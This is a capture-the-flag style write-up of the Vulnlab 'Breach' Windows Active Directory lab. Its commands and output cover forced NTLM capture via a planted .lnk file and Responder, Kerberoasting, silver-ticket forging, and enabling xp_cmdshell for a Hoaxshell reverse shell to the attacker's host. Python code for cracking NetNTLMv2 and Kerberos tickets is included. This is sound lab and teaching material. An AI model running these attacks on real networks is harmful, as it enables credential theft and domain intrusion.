Overview#
- Platform: Vulnlab
- Difficulty: Medium
- OS: Windows
- Skills: Active Directory, privilege escalation, mssql
Assumed Breach Credentials: No assumed breach
Reconnaissance#
Nmap Scan#
sudo nmap -sC -sV -p- -T4 $IP -vv
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-10-09 18:17:27Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.72.195:1433:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
|_ Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
|
| ms-sql-info:
| 10.10.72.195:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-10-09T18:18:56+00:00; +1m58s from scanner time.
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-10-09T18:18:16+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
|_ssl-date: 2025-10-09T18:18:56+00:00; +1m59s from scanner time.
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Add breach.vl and breachdc.breach.vl to /etc/hosts. Also note the roughly two-minute clock skew nmap reports (+1m58s); Kerberos tolerates five minutes by default, so it is fine here, but a larger skew would break the Kerberoasting and ticket-based authentication later on.
First, we can check SMB for null (guest) authentication and see whether any shares are readable or writable.
crackmapexec smb 10.10.81.20 -u 'f' -p '' --shares
SMB 10.10.81.20 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.20 445 BREACHDC [+] breach.vl\f:
SMB 10.10.81.20 445 BREACHDC [+] Enumerated shares
SMB 10.10.81.20 445 BREACHDC Share Permissions Remark
SMB 10.10.81.20 445 BREACHDC ----- ----------- ------
SMB 10.10.81.20 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.81.20 445 BREACHDC C$ Default share
SMB 10.10.81.20 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.81.20 445 BREACHDC NETLOGON Logon server share
SMB 10.10.81.20 445 BREACHDC share READ,WRITE
SMB 10.10.81.20 445 BREACHDC SYSVOL Logon server share
SMB 10.10.81.20 445 BREACHDC Users READ
So null (guest) authentication works: we can read several shares and even write to one of them (`share`). Since we have no credentials for any of the other services on the box and cannot run BloodHound yet, the writable share is the obvious foothold.
Whenever I can write to a share, the first thing I try is the NetExec slinky module. It drops .lnk files whose icon path points at an SMB server we control; when a user browses the folder, Explorer tries to render the icon, connects to our server and authenticates with NTLM, and we capture the NetNTLMv2 response with Responder.
nxc smb breach.vl -u test -p '' -M slinky -o name=beejay server=10.8.7.149
SMB 10.10.81.20 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.10.81.20 445 BREACHDC [+] breach.vl\test: (Guest)
SMB 10.10.81.20 445 BREACHDC [*] Enumerated shares
SMB 10.10.81.20 445 BREACHDC Share Permissions Remark
SMB 10.10.81.20 445 BREACHDC ----- ----------- ------
SMB 10.10.81.20 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.81.20 445 BREACHDC C$ Default share
SMB 10.10.81.20 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.81.20 445 BREACHDC NETLOGON Logon server share
SMB 10.10.81.20 445 BREACHDC share READ,WRITE
SMB 10.10.81.20 445 BREACHDC SYSVOL Logon server share
SMB 10.10.81.20 445 BREACHDC Users READ
SLINKY 10.10.81.20 445 BREACHDC [+] Found writable share: share
SLINKY 10.10.81.20 445 BREACHDC [+] Created LNK file on the share share
Note that after starting Responder you may not get a callback even after waiting a while. The slinky module only drops the .lnk into the root of the share, so if whoever browses the share opens its subdirectories rather than the root, the file is never rendered and no authentication is triggered.
Therefore, download the .lnk from `share`, copy it manually into the other directories in the share (the `transfer` folder in particular), and then start Responder.
sudo responder -I tun0 -v
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.8.7.149]
Responder IPv6 [fe80::ff8b:1180:777f:3c81]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-CF23CVPX6EP]
Responder Domain Name [JASG.LOCAL]
Responder DCE-RPC Port [47264]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[!] Error starting TCP server on port 389, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.10.81.20
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:944eb9e9f43e1dd...
Responder captured a NetNTLMv2 response for julia.wong; we cracked it with john (the `netntlmv2` format) and recovered the password Computer1, which is used in the commands below.
Now let's enumerate with her credentials:
smbclient -U 'julia.wong' //breach.vl/share
Password for [WORKGROUP\julia.wong]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 10 07:27:41 2025
.. DHS 0 Thu Feb 17 15:38:00 2022
beejay.lnk A 946 Fri Oct 10 07:26:22 2025
finance D 0 Thu Feb 17 11:19:34 2022
software D 0 Thu Feb 17 11:19:12 2022
transfer D 0 Fri Oct 10 07:26:57 2025
7863807 blocks of size 4096. 2618345 blocks available
smb: \> cd transfer\
smb: \transfer\> ls
. D 0 Fri Oct 10 07:26:57 2025
.. D 0 Fri Oct 10 07:27:41 2025
beejay.lnk A 946 Fri Oct 10 07:26:57 2025
claire.pope D 0 Thu Feb 17 11:21:35 2022
diana.pope D 0 Thu Feb 17 11:21:19 2022
julia.wong D 0 Thu Feb 17 11:24:39 2022
7863807 blocks of size 4096. 2617763 blocks available
smb: \transfer\> cd julia.wong\
smb: \transfer\julia.wong\> ls
. D 0 Thu Feb 17 11:24:39 2022
.. D 0 Fri Oct 10 07:26:57 2025
local.txt A 36 Thu Feb 17 11:25:02 2022
7863807 blocks of size 4096. 2614416 blocks available
Julia has access to the same shares as the guest account, but with her credentials we can read her personal folder under `share\transfer\julia.wong`, which holds `local.txt`, the user flag.
Next, let's see whether we can log into MSSQL with her domain account:
impacket-mssqlclient julia.wong:'Computer1'@10.10.81.20 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Julia.Wong guest@master)> SELECT name FROM master..sysdatabases;
name
------
master
tempdb
model
msdb
SQL (BREACH\Julia.Wong guest@master)> enable_xp_cmdshell
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
SQL (BREACH\Julia.Wong guest@master)> enum_logins
name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin
------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- ---------
sa SQL_LOGIN 1 1 0 0 0 0 0 0 0
BUILTIN\Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
SQL (BREACH\Julia.Wong guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
Nothing useful yet. The instance has a login for `BUILTIN\Users`, which is why any domain user can connect, but that login maps to `guest` and holds no server roles: we cannot enable xp_cmdshell, there are no impersonation grants, and browsing the file system with xp_dirtree turned up nothing interesting. Note also that `sa` is disabled (`is_disabled` = 1), so it is not a target here.
Let's run BloodHound and see whether our user has anything interesting:

Julia has no outbound control over other objects, but there is a Kerberoastable account, svc_mssql (it has an SPN registered). Let's Kerberoast it and, if the password cracks, use the account to try to escalate inside MSSQL.
impacket-GetUserSPNs -outputfile kerberoastables.txt -dc-ip 10.10.81.20 'breach.vl/julia.wong:Computer1'
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$373a843a60378b2d5b0a7915d6c4d90e$8fa569e98bd9e10ee16988c20176da774f8d8e0b20740bb279d41b073978644355894dc2e78dfcf5de3a25c19c129866657fdf5db54440ce1129fec7bfb2e6076420b702bdbd9dc07c1f9623c39291016d50bc4a6892e6bd365507d53a7c2aff4d7bb0c6436bb8fa5a8646354b5aed16d18dbc72637f0938d5e23ea05ce6e33f3df2beaca41f4081fa794b6bd2f94a22c8f081a51a00c6f5fa9c7a0bf6fa58583b17c0ee32b36cff246c35269399ddbee5777ab8ed042b421a1e56d627f69a464bfb835dc810ae6fa97d9886b856d217800fde774e1c2b8cc42c94e8520394dc6ff1a5f3fa17f9ea986b16759f776a2fb7ba7c10c6be200c1518ff77240d1f311765f2937143b988e7ddd410731f33e323233fbafefe0ac98078db3878cdeea18014827757932f44b0a08715eb4fbcbcb40f70105b05a531b13265fd52fed95d37a5e38591545e0f48d047e2f7e14101b9c1885965971871b96cda5c134ca02171f6c9df76869bc2fb94409043ade4a06a7074e35ea7bb0816ee83fbc318cbb2b7f58d1963d6c9092ec2a6370be1dda3b53b3f5aa2ad45346bf12e1fe41d74907a7523db03a282f718d24ccb74ea1d7aa975fb14c42f5a1a89ca5eceb0d4d6e5f601e785957ef3d322f6b031a3db8510f1c1858621750aeae677606a479e93113ed04fa5902344f5898e3ff72efadf4869ebff040d9a237c0908817eccbd5a7f3811df9e5705f59cacb43999150f790e3cc5bfbf3f6f41c1604ad75f9e026f2749614e9a090acd36e602d379b0109d12d1edd2cc395b6f6aa5fc0ae6453455a13351df33c0e53e55d0d578f4c52dddb09aad7d242b7eeebeeedd4b1dfc38b7bf5e78c5960bd9bc0eef72cbab88daac51ffd6f7809012072214ad7984c945b5c9d43ea06375adb4cebf11661884108928036cdeb668118465733336e7e9fd8463c3acf316ae74a02d01301102d88efdba4c9a0ea75ab6fd8a4c6d7ebff416fd5097019bb43ca316e08799305e4087a5b8b51d9f7db43e43ba2463758a7fff22c217a32a231f20946d127ac3a8d4b4860b2120f04c9d9e66b1dc914c336ae8d00883a30b3478d28a2b945df5cad20865b2cab42659b38bfcbf792c4122b954e6679bddb8785a72ce6559b5cdde82b7bddbf475a91ccb70372422ab32b6215a635c456592115f860fce350dd4b7bdee7a247898953b3d2212d222f836ee3ce3c75441960186d93ae976792a5bc3a7fa2a005b31aad3a95c050a6d0749e78d54e373e2d4e2760641b536b63fee61d30cae8a3cb33d451d073b585a698bca4d64e984c6c6a6479c02c5192a7521b4322efd71dca4ce9fc6ea29eaaa9c5b96e
6f215a6f32ef4f34339c6e028de786a8e3003ae0b78883f6be753c5aad027b138c24867c2be3c40ea3e3e2c4ac6dd1c90d195145ea39c316b2c753554d9dcb4900f1e5612e57aa0cdaab1a5b3aefd345c81d0246c6d190f
Crack the TGS hash with john (format krb5tgs, etype 23):
john hash1.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1 (?)
1g 0:00:00:00 DONE (2025-10-10 07:46) 10.00g/s 522240p/s 522240c/s 522240C/s patitos..lili12
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We now own svc_mssql. Connecting to MSSQL with its credentials (still mapped to `guest`, as the prompt shows), let's see whether it can enable xp_cmdshell:
SQL (BREACH\svc_mssql guest@master)> enable_xp_cmdshell
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
Hmm, okay. We can try something I recently learned: a silver ticket attack.
A silver ticket is a forged Kerberos service ticket (TGS) rather than a forged TGT (a golden ticket). A service ticket is encrypted with the long-term key of the account the service runs as, and the service trusts the PAC inside it. Here that account is svc_mssql, and we know its password, so we can forge a ticket for the MSSQLSvc SPN whose PAC claims we are any user we like; impacket's ticketer defaults to Administrator (RID 500) with Domain Admins and the other privileged groups. The ticket is generated offline and presented directly to the service, so the KDC never sees a TGS request: there is no 4769 event on the DC, which makes it quieter than a golden ticket, and detection has to rely on the logon events on the service host. Windows services do not validate the PAC with the KDC by default, which is why the forged PAC is accepted. With the forged ticket we get sysadmin inside MSSQL, enable xp_cmdshell, and finally drop a reverse shell.
For this we need the NT hash of svc_mssql: with RC4-HMAC (etype 23) the Kerberos long-term key is the NT hash itself, i.e. MD4 over the UTF-16LE encoded password. Since we already have the password this step is easy (on OpenSSL 3, MD4 lives in the legacy provider, so add `-provider legacy -provider default` if openssl complains about an unknown digest):
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c
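Two steps above lean on the same primitive: cracking Julia's NetNTLMv2 response with john, and deriving svc_mssql's NT hash for the ticket. The following Python is an added example and not code from this page, Responder or impacket. It implements MD4 itself (OpenSSL 3 moved MD4 to the legacy provider, so `hashlib.new("md4")` is often unavailable), derives the NT hash, and then replays what john computes per candidate for a Responder-style `user::DOMAIN:challenge:proof:blob` line. The server challenge and blob are constructed test data, not the truncated capture shown above; only the usernames and the recovered passwords come from the page.

```python
import hmac
import hashlib
import struct

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, implemented here because OpenSSL 3 hides MD4 in its legacy provider."""
    bit_len = len(data) * 8
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        # Round 1: words in order, rotations 3 7 11 19
        for i in range(16):
            a = _rotl((a + f(b, c, d) + x[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        # Round 2: words 0 4 8 12 1 5 9 13 ..., rotations 3 5 9 13
        for i in range(16):
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + x[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        # Round 3: words 0 8 4 12 2 10 6 14 ..., rotations 3 9 11 15
        for i in range(16):
            a = _rotl((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & _MASK, (b0 + b) & _MASK, (c0 + c) & _MASK, (d0 + d) & _MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is also the RC4-HMAC (etype 23) Kerberos key."""
    return md4(password.encode("utf-16-le"))


def netntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr for one candidate password: the per-guess work john/hashcat do for netntlmv2."""
    ntlmv2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntlmv2_key, server_challenge + blob, hashlib.md5).digest()


def crack_netntlmv2(responder_line: str, wordlist):
    """Parse a Responder 'user::DOMAIN:challenge:proof:blob' line and return the matching candidate."""
    user, _, domain, chall_hex, proof_hex, blob_hex = responder_line.split(":")
    chall, proof, blob = bytes.fromhex(chall_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(netntlmv2_proof(candidate, user, domain, chall, blob), proof):
            return candidate
    return None


def make_responder_line(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a Responder-style line for a known password (used only to create test data)."""
    proof = netntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample, NOT the capture from the page: fixed 8-byte server challenge and a
# minimal NTLMv2 blob (version, timestamp, client challenge, one AV pair for the domain).
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = (bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("a1a2a3a4a5a6a7a8")
               + bytes(4) + bytes.fromhex("02000c00") + "BREACH".encode("utf-16-le") + bytes(8))
SAMPLE_LINE = make_responder_line("Computer1", "Julia.Wong", "BREACH", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print("NT hash of Trustno1:", nt_hash("Trustno1").hex())
    print("cracked:", crack_netntlmv2(SAMPLE_LINE, ["Password1", "Computer1", "Trustno1"]))
```

The username is upper-cased before it is fed into the HMAC while the domain is not, which is why Responder records the domain exactly as the client sent it; get either wrong and no wordlist will ever match.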
Then forge the ticket. The SPN is the one registered on svc_mssql (visible in BloodHound) and must match what the client will ask for; the domain SID is the S-1-5-21-... prefix shared by every account SID in the domain:
impacket-ticketer -nthash '69596c7aa1e8daee17f8e78870e25a5c' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain 'breach.vl' -spn 'MSSQLSvc/breachdc.breach.vl:1433' 'svc_mssql'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/svc_mssql
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in svc_mssql.ccache
export KRB5CCNAME=svc_mssql.ccache
klist
Ticket cache: FILE:svc_mssql.ccache
Default principal: svc_mssql@BREACH.VL
Valid starting Expires Service principal
10/10/2025 08:47:34 10/08/2035 08:47:34 MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
renew until 10/08/2035 08:47:34
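The Kerberoast step and the silver ticket are two sides of the same key. The enc-part of a real TGS for `MSSQLSvc/breachdc.breach.vl:1433` is encrypted by the KDC with svc_mssql's RC4-HMAC key, which is its NT hash; john brute-forces that hash by trying MD4 of each candidate as the key and checking the HMAC. Once we hold the same key we can mint a ticket ourselves, exactly as ticketer did above. The following Python is an added example, not code from the page or from impacket or john. It implements RFC 4757 RC4-HMAC (etype 23) with key usage 2 (the Ticket enc-part), formats the result the way GetUserSPNs does, and replays john's check. The NT hash is the one computed on the page; the plaintext EncTicketPart and the confounder are constructed stand-ins, not the real ticket.

```python
import hmac
import hashlib
import re

# NT hash of svc_mssql's password (Trustno1), as computed on the page: the etype 23 long-term key.
SVC_MSSQL_NT = bytes.fromhex("69596c7aa1e8daee17f8e78870e25a5c")
KEY_USAGE_TICKET = 2  # RFC 4120 key usage for the enc-part of a Ticket (AS-REP/TGS-REP)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR; encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _k1(nt_key: bytes, usage: int) -> bytes:
    """RFC 4757: K1 = HMAC-MD5(K, little-endian 4-byte key usage)."""
    return hmac.new(nt_key, usage.to_bytes(4, "little"), hashlib.md5).digest()


def rc4_hmac_encrypt(nt_key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """edata = checksum || RC4(K3, confounder || plaintext), with K3 = HMAC-MD5(K1, checksum)."""
    k1 = _k1(nt_key, usage)
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_decrypt(nt_key: bytes, usage: int, edata: bytes):
    """Return the plaintext if the checksum verifies under nt_key, otherwise None."""
    k1 = _k1(nt_key, usage)
    checksum, body = edata[:16], edata[16:]
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plain = rc4(k3, body)
    if not hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum):
        return None
    return plain[8:]  # strip the 8-byte confounder


def to_john_krb5tgs(user: str, realm: str, spn: str, edata: bytes) -> str:
    """GetUserSPNs output format: $krb5tgs$23$*user$REALM$spn*$checksum$ciphertext."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def crack_krb5tgs(john_line: str, candidate_nt_keys):
    """Replay john's per-candidate check: derive K1/K3 from the candidate key and verify the HMAC."""
    m = re.fullmatch(r"\$krb5tgs\$23\$\*[^*]*\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)", john_line)
    if m is None:
        return None
    edata = bytes.fromhex(m.group(1) + m.group(2))
    for key in candidate_nt_keys:
        if rc4_hmac_decrypt(key, KEY_USAGE_TICKET, edata) is not None:
            return key
    return None


# Constructed stand-ins: a real EncTicketPart is DER (APPLICATION 3) carrying the PAC;
# a real confounder is 8 random bytes. Fixed values here keep the example deterministic.
SAMPLE_PLAIN = b"\x63EncTicketPart stand-in: cname=Administrator groups=512,513,518,519,520"
SAMPLE_CONFOUNDER = bytes(range(8))
SAMPLE_EDATA = rc4_hmac_encrypt(SVC_MSSQL_NT, KEY_USAGE_TICKET, SAMPLE_PLAIN, SAMPLE_CONFOUNDER)
SAMPLE_LINE = to_john_krb5tgs("svc_mssql", "BREACH.VL", "breach.vl/svc_mssql", SAMPLE_EDATA)

if __name__ == "__main__":
    print(SAMPLE_LINE[:80] + "...")
    print("key recovered:", crack_krb5tgs(SAMPLE_LINE, [bytes(16), SVC_MSSQL_NT]) == SVC_MSSQL_NT)
```

This is also why the usual hardening works: a long random service password or a gMSA makes the per-candidate check above hopeless, and restricting the account to AES (msDS-SupportedEncryptionTypes) replaces the NT hash with a salted PBKDF2-derived key, so a leaked NT hash no longer lets anyone read or forge tickets for the SPN.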
Now let's use the ticket against MSSQL. The forged PAC says we are Administrator, so the session should come in as sysadmin. Keep in mind that xp_cmdshell runs as the SQL Server service account (svc_mssql), not as the impersonated Administrator: the silver ticket elevates us inside SQL Server, while the OS-level context stays that of the service.
impacket-mssqlclient -no-pass -k breach.vl/svc_mssql@breachdc.breach.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)> enable_xp_cmdshell
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> xp_cmdshell whoami
output
----------------
breach\svc_mssql
Okay, on to the most annoying part of this box: bypassing the obnoxious AV that was present on it...
I tried many payloads with xp_cmdshell; the only one, or at least the first one, that worked for me was using Hoaxshell to get a shell.
hoaxshell -s 10.8.7.149 -p 4444 -H "Authorization"
┬ ┬ ┌─┐ ┌─┐ ─┐ ┬ ┌─┐ ┬ ┬ ┌─┐ ┬ ┬
├─┤ │ │ ├─┤ ┌┴┬┘ └─┐ ├─┤ ├┤ │ │
┴ ┴ └─┘ ┴ ┴ ┴ └─ └─┘ ┴ ┴ └─┘ ┴─┘ ┴─┘
by t3l3machus
[Info] Generating reverse shell payload...
powershell -e <base64 payload omitted>
Copied to clipboard!
[Info] Type "help" to get a list of the available prompt commands.
[Info] Http Server started on port 4444.
[Important] Awaiting payload execution to initiate shell session...
[Shell] Payload execution verified!
[Shell] Stabilizing command prompt...
PS C:\Windows\system32 > cd /
PS C:\ > cd users
PS C:\users > cd svc_mssql
PS C:\users\svc_mssql > cd desktop
PS C:\users\svc_mssql\desktop > whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
